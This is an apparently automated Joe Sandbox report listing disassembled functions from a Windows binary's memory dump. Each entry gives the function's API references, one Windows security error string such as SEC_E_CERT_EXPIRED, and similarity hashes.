_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_CROSSREALM_DELEGATION_FAILURE, xrefs: 00007FF7F8D12EC6

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_CROSSREALM_DELEGATION_FAILURE
API String ID: 2544740495-1734344644
Opcode ID: ae32f364118637ad00afb3653030329906ec909127810c3e51e91090530be498
Instruction ID: 016e372050213d963b370792e1da148dcf1bd0f4799b342c6d33eeceb5189f07
Opcode Fuzzy Hash: ae32f364118637ad00afb3653030329906ec909127810c3e51e91090530be498
Instruction Fuzzy Hash: 9401EC2560D946D6F755BB61A0142BCE311AF5CBA5FC50075CA2E067D1CF3C9449A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12ED2 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_CRYPTO_SYSTEM_INVALID, xrefs: 00007FF7F8D12ED2

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_CRYPTO_SYSTEM_INVALID
API String ID: 2544740495-1517516476
Opcode ID: ad4548a47a1f82779d16a46da15ae85a1fd6e127cc13e302e2b2ba19efe5ac4f
Instruction ID: f3f74b10e739b8ccc3c61f5b91c6857518009a55088b4fa50a06843d8285a27f
Opcode Fuzzy Hash: ad4548a47a1f82779d16a46da15ae85a1fd6e127cc13e302e2b2ba19efe5ac4f
Instruction Fuzzy Hash: 6401EC2560DA4696F755BB61A0142BCE311AF5CBA5FC50075CA2E077D1CF3CA449A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12EA2 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_CERT_UNKNOWN, xrefs: 00007FF7F8D12EA2

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_CERT_UNKNOWN
API String ID: 2544740495-2007521339
Opcode ID: 035a250fa00b015db1fc9946b93f758df49a2f3418e66358b7aab6d4f5f2d6b6
Instruction ID: 999b00ce04c7da19a8faf6a7168fdff03c05184ca8d7387cac323c0273310100
Opcode Fuzzy Hash: 035a250fa00b015db1fc9946b93f758df49a2f3418e66358b7aab6d4f5f2d6b6
Instruction Fuzzy Hash: 02012C2560D94296F755BB61A0142BCE311AF4CBA1FC50075CA2E027D1CF3C9449A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12EAE Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_CERT_WRONG_USAGE, xrefs: 00007FF7F8D12EAE

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_CERT_WRONG_USAGE
API String ID: 2544740495-764331422
Opcode ID: dbae3221a14e67816685da3d06e4906bccb1adc45336976caae83bb5da933b08
Instruction ID: 4ebf11dbec92ceb158d7df6d316166324413174410a2bf0c8b66d5c8c7b3d2f8
Opcode Fuzzy Hash: dbae3221a14e67816685da3d06e4906bccb1adc45336976caae83bb5da933b08
Instruction Fuzzy Hash: 5B01EC2560D946D6F755BB61A0142BCE311AF5CBA5FC50075CA2E067D1CF3C9449A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12E7E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_CANNOT_INSTALL, xrefs: 00007FF7F8D12E7E

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_CANNOT_INSTALL
API String ID: 2544740495-355282904
Opcode ID: 42cfa13e420642d59810f35ef37644174fe91466f1d7b6ee93156bc9ee86c13e
Instruction ID: 47eee08232f97b58a30720317cdd8fca9a8e9293c7e57520e82290f5675f72cb
Opcode Fuzzy Hash: 42cfa13e420642d59810f35ef37644174fe91466f1d7b6ee93156bc9ee86c13e
Instruction Fuzzy Hash: A701EC2560D946D6F755BB61A0142BCE311AF5CBA5FC50075CA2E067D1CF3C9449A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12E8A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_CANNOT_PACK, xrefs: 00007FF7F8D12E8A

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_CANNOT_PACK
API String ID: 2544740495-3415512108
Opcode ID: ba59c7f3d15e17c2e9eb1c20340d2f764d3eb529ba5ac423a12f02bc3e93c5eb
Instruction ID: 987b27ab90b9fc1679a4c6bda918d196122878b9981df501c2db718b635c203a
Opcode Fuzzy Hash: ba59c7f3d15e17c2e9eb1c20340d2f764d3eb529ba5ac423a12f02bc3e93c5eb
Instruction Fuzzy Hash: 2201EC2560D94696F755BB61A0142BCE311AF5CBA5FC50075CA2E067D1CF3C9449A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12E96 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_CERT_EXPIRED, xrefs: 00007FF7F8D12E96

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_CERT_EXPIRED
API String ID: 2544740495-3284210359
Opcode ID: a5ca190e9d83c6233305593e2991ab3d52bd714a0bead48d49639c8e5069add4
Instruction ID: 5418b409cd2b95a88f83ecb55cf4c468f83291dbee49d4bed5ee443b922f6bc8
Opcode Fuzzy Hash: a5ca190e9d83c6233305593e2991ab3d52bd714a0bead48d49639c8e5069add4
Instruction Fuzzy Hash: 9501EC2560D946D6F755BB61A0182BCE311AF5CBA5FC90075CA2E067D1CF3CA449A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12E5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_BAD_BINDINGS, xrefs: 00007FF7F8D12E5A

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_BAD_BINDINGS
API String ID: 2544740495-2221957427
Opcode ID: 634f1e0a1f4724e898f9b5aa7ec7593d40f326e753c7d7c7d9056edf4197a870
Instruction ID: aa87f8c6fef1efa8caffe7ab9665003024e4fb378748bc07f2c82e7c7f4a6424
Opcode Fuzzy Hash: 634f1e0a1f4724e898f9b5aa7ec7593d40f326e753c7d7c7d9056edf4197a870
Instruction Fuzzy Hash: 3B012C2560D94296F755BB61A0142BCE311AF4CBA1FC50075CA2E027D1CF3C9449A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12E66 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_BAD_PKGID, xrefs: 00007FF7F8D12E66

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_BAD_PKGID
API String ID: 2544740495-630439053
Opcode ID: c84fdb9044b40a2b78d917f5162a8be5d1877f63145fc5db64a7ddc7578194d4
Instruction ID: ad2839bad7be7a545a24fbdccf65687bfaca793f4a0da524824481423077964a
Opcode Fuzzy Hash: c84fdb9044b40a2b78d917f5162a8be5d1877f63145fc5db64a7ddc7578194d4
Instruction Fuzzy Hash: 4B01EC2560D94696F755BB61A0142BCE311AF5CBA5FC50075CA2E067D1CF3C9449A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12E72 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_BUFFER_TOO_SMALL, xrefs: 00007FF7F8D12E72

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_BUFFER_TOO_SMALL
API String ID: 2544740495-2050584575
Opcode ID: 3bed5df98c29a34f6716d06785b1618b5447e05bfe6b7e48da1a7065c33941ed
Instruction ID: 6d6d3cfee51a26b4e579ea52b35b13c8bfd3f09ae6b6f9e7cf2fa8b755f0b0ed
Opcode Fuzzy Hash: 3bed5df98c29a34f6716d06785b1618b5447e05bfe6b7e48da1a7065c33941ed
Instruction Fuzzy Hash: C901EC2560D94696F755BB61A0142BCE311AF5CBA5FC50075CA2E067D1CF3CA449A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12E4E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_ALGORITHM_MISMATCH, xrefs: 00007FF7F8D12E4E

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_ALGORITHM_MISMATCH
API String ID: 2544740495-610387095
Opcode ID: b900f2a389954035773d7d15278cae6056f7cf10232b9d949d7c249253186678
Instruction ID: 2e8e5c364bca375aa0b58b96d7417d3fe9cf7ce9d4e2a06d2b3d7c57d72b400b
Opcode Fuzzy Hash: b900f2a389954035773d7d15278cae6056f7cf10232b9d949d7c249253186678
Instruction Fuzzy Hash: AF012C2560D94296F755BB61A0142BCE311AF4CBA1FC50075CA2E027D1CF3C9449A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12FFE Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_MUST_BE_KDC, xrefs: 00007FF7F8D12FFE

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_MUST_BE_KDC
API String ID: 2544740495-2335993699
Opcode ID: dea6ffc0b8b72aaaad6682cf6653a5c2baf81b037f937a8cd5077da2c6a79628
Instruction ID: 85029bd9ced2d97c792df3312888429a6506d9b8ad99121240c3f03415a2021a
Opcode Fuzzy Hash: dea6ffc0b8b72aaaad6682cf6653a5c2baf81b037f937a8cd5077da2c6a79628
Instruction Fuzzy Hash: 55012C2560D94296F755BB61A0142BCE311AF5CBA1FC50075CA2E027D1CF3C9449A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D1300A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_NOT_OWNER, xrefs: 00007FF7F8D1300A

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_NOT_OWNER
API String ID: 2544740495-507308227
Opcode ID: 73727401563156496e36667145b69b6cb43f862891947be141316d82d1d2d095
Instruction ID: 4ae8d305585568935b9848d4eb54f28f3c1427e79ba6ba1624f963e0e411fdec
Opcode Fuzzy Hash: 73727401563156496e36667145b69b6cb43f862891947be141316d82d1d2d095
Instruction Fuzzy Hash: 0701EC2560D946DAF755BF61A0142BCE311AF5CBA5FC50075CA2E067D1CF3C9449A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D13016 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_NO_AUTHENTICATING_AUTHORITY, xrefs: 00007FF7F8D13016

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_NO_AUTHENTICATING_AUTHORITY
API String ID: 2544740495-3363050765
Opcode ID: b2e8b78780d31bde5b0041230b9b95281c348725faafd9980254ce2bc6e88244
Instruction ID: 88c2516f3d8e8d9ed6268d4270a82785c7533111aae3f5a93fef4520ef18c769
Opcode Fuzzy Hash: b2e8b78780d31bde5b0041230b9b95281c348725faafd9980254ce2bc6e88244
Instruction Fuzzy Hash: 34012C2560D94296F755BF61A0142BCE311AF5CBA1FC50075CA2E027D1CF3C9449A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12FDA Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_MAX_REFERRALS_EXCEEDED, xrefs: 00007FF7F8D12FDA

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
